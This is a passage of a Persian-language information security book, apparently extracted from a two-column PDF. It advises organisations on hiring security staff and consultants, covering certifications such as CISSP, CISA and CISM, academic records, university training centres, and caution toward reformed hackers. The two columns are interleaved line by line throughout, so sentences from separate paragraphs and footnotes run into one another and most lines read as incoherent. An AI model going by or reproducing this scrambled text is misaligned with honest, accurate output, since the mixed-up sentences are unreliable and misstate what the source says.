ﺑﺎﺷﻨﺪ ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻨﺪ ﺩﺭ ﻓﻬﺮﺳﺖ "ﻣﺸﺘﺮﻳﺎﻥ ﻣﺮﺟﻊ" ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤﻴﻂ ﻛﺎﺭﻱ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﺩﻫﺪ .ﺍﻳﻦ ﻧﻜﺘﻪ
ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺑﻌﻀﻲ ﺷـﺮﻛﺘﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﺍﺭﺍﺋـﻪ ﻫـﺮ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳـﻮﺍﺑﻖ ﻛـﺎﺭﻱ ﺩﺭ ﻳـﻚ ﺣـﻮﺯﺓ
ﺍﻃﻼﻋـــﺎﺗﻲ ﺍﺯ ﺷـــﻤﺎ ﺑﺨﻮﺍﻫﻨـــﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـــﻪﺍﻱ ﺩﺍﻝ ﺑـــﺮ ﺧﺎﺹ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺭﻧﻤﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ؛ ﺍﻣـﺎ
ﺳﺮﻱ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺳﻨﺎﺩ ﺍﻣﻀﺎ ﻛﻨﻴﺪ .ﺍﺯ ﺧﺪﻣﺎﺕ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺤﺘﺎﻁ ﺑﺎﺷﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺷـﻮﺍﻫﺪ ﺭﻭﺷـﻨﻲ ﺑـﺮﺍﻱ
ﺍﺳﻢ ﻭ ﺍﺳﻨﺎﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻭ ﺗﺄﻳﻴﺪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ.
ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﻮﻥ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺷﻤﺎ ﻧﻴﺰ ﺑﺪﻭﻥ ﻣﺠـﻮﺯ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﻌـﺪﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺎ ﻣﺴﺎﺋﻞ ﺯﻳﺮ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷـﺘﻪ
ﺧﻮﺩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧـﺎﺭﺝ ﺑﺎﺷﻨﺪ:
ﺑﺪﻧﺒﺎﻝ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎﺷﻴﺪ؛ ﺑﺨﺼﻮﺹ: ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﺎ ﻳﻚ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻛﻤﻚ ﮔﺮﻓﺘﻴﺪ ،ﻓﺮﺍﻣـﻮﺵ ﻧﻜﻨﻴـﺪ
ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺷﺮﺍﻳﻂ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﺔ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻇﺮﻓﻴﺖ ﻣﺤﻠﻲ ﺳﺎﺯﻣﺎﻥ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﺸﻮﺭ ﺷـﻤﺎ ﻛﻤـﻚ
ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑﺨﻮﺍﻫﻴﺪ ﻭ ﺍﺯ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻨﻨﺪ.
ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﺯ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻗﺎﺑﻞ
ﻼ ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﻃﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮔﺬﺍﺭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺍﻳﻦ ﻛﺎﻣ ﹰ
ﺧﺮﻳﺪ ﻫﺴﺘﻨﺪ ﻭ ﻓﺮﺩ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺩﺭ ﻳﻜـﺴﺮﻱ ﺍﺯ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻛﻤﻚ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺧـﺎﺭﺟﻲ ﺍﺳـﺘﻔﺎﺩﻩ
ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻳـﺎ ﻛﻼﺳـﻬﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺷـﺮﻛﺖ ﻛﻨـﺪ،
ﻣﻄﺎﻟﺐ ﺗﺌﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ ،ﻭ ﺳﺆﺍﻻﺕ ﻛﻨﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺍﺑـﻂ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ
ﺗﺴﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﭼﻨﺪﺍﻥ ﺍﺭﺯﺷﻤﻨﺪ ﻧﻴـﺴﺘﻨﺪ. ﺩﺍﻧﺶ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺘﻌﺪﺍﺩﻫﺎﻱ ﺑـﻮﻣﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﺠﺎﺭﺏ ﻋﻤﻠﻲ ﻭ ﺍﻣﻜﺎﻥ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﺗﺨﺼﺺ ﻋﻤﻴﻘﺘﺮ ﻣﻲﺑﺎﺷﻨﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫﻨﻮﺯ ﻳﻚ ﺑﺤﺚ ﺩﺭﺣﺎﻝ ﺗﻜﺎﻣﻞ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺍﺯ ﺍﺷـﺎﺭﻩ
ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻓﻌﻠﻲ ﺁﻥ ﺍﻛﺮﺍﻩ ﺩﺍﺭﻳﻢ ،ﺍﻣﺎ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺑﻪ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ١٠٦CISSPﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻫﺮﭼﻨـﺪ ﻫﻤـﺔ ﺁﻥ ﻣﻬﻤﺘــﺮ ﺍﺯ ﻫﻤــﻪ ﺑﺎﻳــﺪ ﺩﺭ ﻓﻜــﺮ ﺍﻓــﺮﺍﺩﻱ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺧــﺪﻣﺎﺕ
ﭼﻴﺰﻱ ﻧﻴﺴﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ،ﺍﻣﺎ ﻳﻚ ﻣﺪﺭﻙ ﻣﻌﺘﺒـﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ.
ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺳﻄﺤﻲ ﻣﻌﻴﻦ ﺍﺯ ﺗﺠﺮﺑﻪ ﻭ ﺗﺨﺼﺺ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺑﺮ ﺧﻼﻑ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩﺍﻱ ،ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﺎﻭﺭﻳﻨﻲ ﻛـﻪ
١٠٧ ﺑﺮﺍﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣـﺪﻩﺍﻧـﺪ ﺑﺎﻳـﺪ ﺑـﺴﻴﺎﺭ
ﺍﺳﺖ.
ﻣﺤﺘﺎﻃﺎﻧﻪ ﺭﻓﺘﺎﺭ ﻛﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻧﻴﺮﻭﻱ ﺧـﺎﺭﺟﻲ ﺑـﺮﺍﻱ
ﺗﺤﺼﻴﻼﺕ ﻻ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺳـﻄﻮﺣﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ
ﺳﻮﺍﺑﻖ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﻓـﺮﺍﺩ ﻣﻬـﺎﺭﺕ ﺑـﺎﻻﻱ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ.
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻧﺘﻴﺠﺔ ﻣﻄﺎﻟﻌـﻪ ﻭ ﺗﺠﺮﺑـﺔ ﺷﺨـﺼﻲ ﺑﺪﺳـﺖ
ﻼ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﺎﻫ ﹺﺮ ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻗﺒ ﹰ
ﺁﻭﺭﺩﻩﺍﻧﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺩﺭﺑﺎﺭﺓ ﻋﻠﻮﻡ ﻭ ﻣﻬﻨﺪﺳﻲ ﺭﺍﻳﺎﻧـﻪ ﻣـﺪﺍﺭﻙ
ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﻤﺎ
ﺗﺤﺼﻴﻠﻲ ﻭ ﺩﺍﻧﺸﻜﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺑﺎﻭﺭ ﺟﻬﺎﻧﻲ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺑﺎﻳﺪ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﻛـﻪ
ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻣﻬﻤﺘﺮ ﺍﺯ ﻣﺪﺍﺭﻙ ﺍﺳﺖ .ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺩﺭ ﺑﺨـﺶ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﺟﺎﻣﻊ ﻧﻴﺴﺖ ،ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﺯ ﻋﻬـﺪﺓ ﻛﺎﺭﺗـﺎﻥ ﺑـﺮ
ﻛﺎﺭﻛﻨﺎﻥ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺍﺩﻋﺎﻫﺎﻱ ﻣﺘﻘﺎﺿـﻴﺎﻥ
ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺗﺨـﺼﺺ ﺧـﻮﺩ ﺍﺩﻋﺎﻫـﺎﻱ
ﺑﺎ ﻣﺪﺍﺭﻛﺸﺎﻥ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ .ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳـﺎﻻﺕ
ﺩﺭﻭﻏﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﻛﻪ ﺗﺨﺼﺼﺸﺎﻥ ﺑـﻪ ﺁﻧﭽـﻪ ﺑـﺪﺍﻥ ﻧﻴـﺎﺯ
ﻣﺘﺤﺪﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ ﻣﺆﺳـﺴﺔ
ﺩﺍﺭﻳﺪ ﻧﺎﻣﺮﺑﻮﻁ ﺍﺳﺖ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﺧﺪﻣﺎﺕ ﻓﺮﺩ ﻳﺎ
ﺁﻣﻮﺯﺷﻲ ﺭﺍ ﺑﻌﻨﻮﺍﻥ "ﻗﻄﺒﻬﺎﻱ ﺁﻣﻮﺯﺷﻲ" ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻃﺒﻖ
ﺷﺮﻛﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺧﻮﺩ ﺍﻋﺘﺮﺍﻑ ﻣﻲﻛﻨﻨﺪ "ﺩﺭ ﺧﻼﻝ ﻛـﺎﺭ،
ﺁﻥ ﻓﻬﺮﺳﺖ ﻃﺮﺣﻬﺎﻱ ﭘﻴـﺸﺮﻭﻱ ﻣﺆﺳـﺴﺔ infosecﺩﺭ ﮊﻭﺋـﻦ
ﻳﺎﺩﮔﻴﺮﻱ ﻫﻢ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ" )ﻭ ﺍﺣﺘﻤﺎ ﹰ
ﻻ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﺟﻪ ﻛﻤﺘـﺮﻱ
۲۰۰۲ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺟﺮﺝ ﻣﻴـﺴﻮﻥ ،١٠٨ﺟﻴﻤـﺰ ﻣﺪﻳـﺴﻮﻥ،١٠٩
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ( ،ﺗﺎ ﺍﻳﻨﻜـﻪ ﻓـﺮﺩﻱ ﺍﺳـﺘﺨﺪﺍﻡ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﻼﺵ
ﺍﻳﺎﻟﺖ ﺍﻳﺪﺍﻫﻮ ،١١٠ﺍﻳﺎﻟـﺖ ﺁﻳـﻮﺍ ،١١١ﺁﻣﻮﺯﺷـﮕﺎﻩ ﻛﺎﺭﺷﻨﺎﺳـﻲ ﺍﺭﺷـﺪ
ﻣﻲﻛﻨﺪ ﻧﻘﺎﻳﺺ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻛﻨﺪ.
ﺑﺎﺯﺍﺭﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ
۱۰۶ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﭘﻮﺭﺗﺎﻝ ﻭﺏ CISSPﺩﺭ: ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺑـﺴﺘﺮﻫﺎﻱ Windowsﺩﺭ ﺳـﻄﻮﺡ
http://www.cissps.com/
۱۰۷ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻳﺮ ﺩﺭ ﺁﺩﺭﺱ www.isaca.orgﺭﺍ ﻧﻴﺰ ﺑﺒﻴﻨﻴﺪ: ﻣﺨﺘﻠﻒ ﺗﺨﺼﺺ ﺩﺍﺭﻧـﺪ ﺍﺷـﺒﺎﻉ ﺷـﺪﻩ ﺍﺳـﺖ ،ﺍﻣـﺎ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ
)CISA (Certified Information Security Auditor ﺑﺴﺘﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺯ ﺟﻤﻠﻪ Unixﻛﻤﺘﺮ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻛﺘﺎﺑﻬﺎ ﻣﻲﺗﻮﺍﻥ
CISM (Certified Information Security
)Manager ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺁﻣﻮﺧﺖ ،ﺍﻣﺎ ﺗﻨﻬﺎ ﻣﻄﺎﻟﻌﺔ ﻛﺘﺎﺏ
108 George Mason University
109 James Medison University ﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﻧﮕﺮﺍﻧـﻲ ﺩﺍﺭﻳـﺪ
110 Idaho
111 Iowa
١٧١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻧﻴﺮﻭﻱ ﺩﺭﻳﺎﻳﻲ ،ﺩﺍﻧﺸﮕﺎﻩ ﭘﻮﺭﺩﻭ ،١١٢ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ
ﺩﺭ ﺩﻳﻮﻳﺲ ،١١٣ﻭ ﺩﺍﻧﺸﮕﺎﻩ ﺍﻳﺪﺍﻫﻮ ﺍﺭﺍﺋﻪ ﺷﺪﻧﺪ .ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬـﺎﻥ
ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﻛﺎﺭ ﺑﺎ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺩﻋﺎ ﻣـﻲﻛﻨﻨـﺪ
ﻣﺮﺍﻛﺰ ﻣﻘﺪﻣﺎﺗﻲ ﻓﺮﺍﻭﺍﻧـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ
ﺩﺍﺭﻧﺪ .ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ ﺧﻮﺩ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗـﺎ
ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ ١١٤.ﺍﮔﺮﭼﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺍﺭﺗﻜـﺎﺏ
ﻣﺮﺍﻛﺰ ﻣﺸﺎﺑﻬﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﺠﺎ ﻣﺴﺘﻘﺮ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﻴﺎﺑﻴﺪ.
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﻋﻀﻮ ﻣﻔﻴﺪﻱ
ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳﻜـﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺑﺨـﺶ
ﺍﺯ ﺟﺎﻣﻌﻪ ﺷﻮﻧﺪ ،ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻪ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﺮﺗﻜﺐ ﺟﺮﺍﺋﻢ
ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﺋﻴﺪ.
ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺳﻮﺀ ﺳﺎﺑﻘﻪ ﺩﺍﺭﻧﺪ ﺧﻮﺵ ﺑﻴﻦ ﺷﺪ .ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻜﺎﺕ
ﺯﻳﺮ ﻗﺎﺑﻞ ﺍﺷﺎﺭﻩﺍﻧﺪ: ﺷﻬﺮﺕ
ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﺧﻮﺩ ﺳﺎﺑﻘﺔ ﺧﺪﺷﻪﺩﺍﺭ .۱ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﭘﺮﻛﺎﺭﺑﺮﺩ ﻧﻮﺷـﺘﻪ ﺑﺎﺷـﺪ ﻳـﺎ ﺩﺭ ﻳـﻚ
ﻛﺮﺩﻥ ﻗﺎﻧﻮﻥ ،ﻣﺎﻟﻜﻴـﺖ ﺷﺨـﺼﻲ ،ﻭ ﺣﻘـﻮﻕ ﺧـﺼﻮﺻﻲ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺘﺎﺑﻲ ﺗـﺄﻟﻴﻒ ﻛـﺮﺩﻩ
ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ﺍﻧﺘﺨﺎﺏ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺭﺍﺋـﻲ ﻭ ﺑﺎﺷﺪ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺷﻨﺎﺳﺖ.
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﺣﺮﺍﺳـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺑﺮﺧﻲ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺳﺎﺑﻘﺔ ﺯﻳﺎﺩﻱ ﺩﺭ ﺩﺍﻣﻨﺔ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣـﺴﺎﺋﻞ
ﺑﺎﺷﻨﺪ .ﺁﻳﺎ ﺷﻤﺎ ﺣﺎﺿﺮﻳﺪ ﺍﺯ ﻳﻚ ﻣﺠـﺮﻡ ﺳـﺎﺑﻘﻪﺩﺍﺭ ﺑـﺮﺍﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺗﻨﻬﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ
ﺑﺨﺶ ﺳﻮﻡ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﻭ ﻫﺸﺪﺍﺭ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ .ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷـﻬﺮﺕ ﺯﻳـﺎﺩ ﻟﺰﻭﻣـﹰﺎ ﺑـﻪ ﻣﻌﻨـﺎﻱ
